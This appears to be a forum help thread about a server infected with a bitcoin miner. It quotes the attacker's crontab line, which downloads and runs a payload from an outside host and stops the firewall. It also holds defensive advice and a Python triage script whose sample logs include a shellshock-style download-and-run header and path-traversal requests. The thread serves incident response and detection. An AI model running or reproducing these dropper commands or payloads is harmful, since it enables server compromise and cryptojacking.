
I installed ClamAV and rootkit detectors and they found nothing.

The virus ran a few processes named "modules" that were eating CPU. My server vendor told me that it is a bitcoin miner virus, but they didn't give me any other info. The only thing that I found out is this cronjob:

*      *       *       *       *       curl -o /tmp/.selfish http://royaltyhomeins.com/.god;/sbin/service iptables stop;wget -O /tmp/.selfish http://royaltyhomeins.com/.god;killall -9 perl;killall -9 packet;perl /tmp/.selfish;rm -rf /tmp/.selfish

I killed all the processes and removed the cronjob. The /tmp folder is empty. The problem is that I didn't find the core "problem". What else can I do?

Amir Bar
  • @Matthew I thought maybe from the cronjob line it is some known virus or something? – Amir Bar Jan 09 '17 at 11:39
    Not really - compromised servers can change rapidly, so even if there was still something showing at that address, it wouldn't necessarily be the same as what was there when your system got attacked. The advice in the canonical answer is the only safe option - just because you find one virus doesn't mean that there aren't others which are a lot sneakier on there too. I know it's a pain, and seems like a lot of work, but it's virtually impossible to be sure you've wiped out the issue otherwise. – Matthew Jan 09 '17 at 12:00

1 Answer


From what you said, it's hard to tell if the server was hacked via your web app/site, or via some outdated software, or some other way, but some things you could try:

  • Check your apache/nginx logs and try to find suspicious requests.
  • Check versions of server software (web server, perl, php...) and look for outdated versions.
  • Do a portscan with nmap and look for ports that are open but should not be.
  • Do a quick scan with nikto or some other webapp security scanner. Try wpscan if you are using wordpress.
  • Keep monitoring outbound connections and look for suspicious activity.
  • Change your passwords.
  • Ask/pay somebody to assess the security of your web app.

But basically only the log files could pinpoint the root cause. The other methods can identify vulnerabilities, but you cannot tell if those were used by the attacker in this case.

pineappleman
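Two steps above lend themselves to code: recognising the dropper behaviour in the cron line from the question, and the answer's first bullet, reading the web-server access log for the request that delivered it. The script below is an added example, not code from the question, the answer or any scanner. The indicator regexes are an assumed, illustrative set rather than a canonical signature list, and the access-log lines are constructed (RFC 5737 test addresses, a made-up payload URL), so it runs offline; the cron line is the one quoted in the question.

```python
"""
Triage helpers for a suspected cryptominer dropper on a Linux web server.
Added example for this thread; the indicator patterns and the sample
access-log lines below are assumptions built for illustration.
"""
import re
from typing import Dict, List

# The crontab line quoted in the question, used here as the test input.
CRON_LINE = ("*      *       *       *       *       curl -o /tmp/.selfish http://royaltyhomeins.com/.god;"
             "/sbin/service iptables stop;wget -O /tmp/.selfish http://royaltyhomeins.com/.god;"
             "killall -9 perl;killall -9 packet;perl /tmp/.selfish;rm -rf /tmp/.selfish")

# Behaviours typical of a download-and-execute dropper (assumed indicator set, not exhaustive).
CRON_INDICATORS = [
    ("runs every minute", re.compile(r"^\s*\*\s+\*\s+\*\s+\*\s+\*\s")),
    ("downloads to hidden tmp file", re.compile(r"\b(curl|wget)\b[^;]*\s-[oO]\s*/(tmp|var/tmp|dev/shm)/\.?\S+")),
    ("disables host firewall", re.compile(r"\b(service|systemctl)\s+(iptables|firewalld)\s+stop\b|\biptables\s+-F\b")),
    ("kills competing processes", re.compile(r"\b(killall|pkill)\s+-9\b")),
    # interpreter runs a file under /tmp and the same file is deleted later on the line
    ("executes then deletes payload", re.compile(r"\b(perl|sh|bash|python)\s+(/tmp/[^\s;]+).*\brm\s+-rf\s+\2")),
]


def score_cron_line(line: str) -> List[str]:
    """Names of the dropper indicators that fire on one crontab line (comments are skipped)."""
    if line.lstrip().startswith("#"):
        return []
    return [name for name, rx in CRON_INDICATORS if rx.search(line)]


# Apache/nginx "combined" log format; the user-agent field may carry backslash-escaped quotes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)

# Request-level indicators (assumed set): what an attacker's delivery request often looks like.
REQUEST_INDICATORS = [
    ("path traversal", re.compile(r"(\.\./){2,}|/etc/passwd")),
    ("shellshock-style header", re.compile(r"\(\)\s*\{\s*:;\s*\}\s*;")),
    ("download-and-run in request", re.compile(r"\b(curl|wget)\b.*/(tmp|var/tmp|dev/shm)/|\b(sh|bash|perl)\s+-c\b", re.I)),
    ("non-browser client", re.compile(r"python-requests|libwww-perl|masscan|zgrab", re.I)),
]

# Constructed sample traffic, not real log data.
SAMPLE_ACCESS_LOG = [
    r'203.0.113.5 - - [09/Jan/2017:10:14:22 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    r'203.0.113.5 - - [09/Jan/2017:10:15:03 +0000] "POST /wp-content/plugins/foo/upload.php HTTP/1.1" 200 88 "-" "python-requests/2.9"',
    r'198.51.100.7 - - [09/Jan/2017:10:15:40 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 42 "-" "() { :;}; /bin/bash -c \"curl http://198.51.100.7/p -o /tmp/.x\""',
    r'192.0.2.10 - - [09/Jan/2017:10:16:01 +0000] "GET /about.html HTTP/1.1" 200 2048 "https://example.com/" "Mozilla/5.0"',
]


def parse_access_line(line: str) -> Dict[str, str]:
    """Split one combined-format line into its fields; raise on anything that does not parse."""
    m = LOG_RE.match(line)
    if not m:
        raise ValueError(f"unparseable access-log line: {line!r}")
    return m.groupdict()


def flag_requests(lines: List[str]) -> List[Dict[str, object]]:
    """One record per request that trips any REQUEST_INDICATOR, in log order."""
    findings: List[Dict[str, object]] = []
    for line in lines:
        rec = parse_access_line(line)
        haystack = " ".join((rec["path"], rec["referer"], rec["ua"]))
        hits = [name for name, rx in REQUEST_INDICATORS if rx.search(haystack)]
        if hits:
            findings.append({"ip": rec["ip"], "ts": rec["ts"], "path": rec["path"], "hits": hits})
    return findings


def suspicious_ips(findings: List[Dict[str, object]]) -> List[str]:
    """Source addresses ordered by first suspicious request; the earliest is where to start reading."""
    seen: List[str] = []
    for f in findings:
        if f["ip"] not in seen:
            seen.append(str(f["ip"]))
    return seen


if __name__ == "__main__":
    print("cron indicators:", score_cron_line(CRON_LINE))
    found = flag_requests(SAMPLE_ACCESS_LOG)
    for f in found:
        print(f["ts"], f["ip"], f["path"], "->", ", ".join(f["hits"]))
    print("start the timeline with:", suspicious_ips(found)[0])
```

On a real host you would feed `flag_requests` the full access log (every rotated copy, not just the current one) and then read everything from the first flagged address in order, since the delivery request usually sits a little before the first miner process appeared. Also check which user's crontab held the entry (`crontab -l -u apache` or the nginx/www-data user versus root): a cron job in the web-server user's crontab points at the web application, while one in root's crontab means the attacker already had more than the web app gave them. A run with no hits does not clear the server; as the comment on the question says, the only safe end state is a rebuild from known-good media.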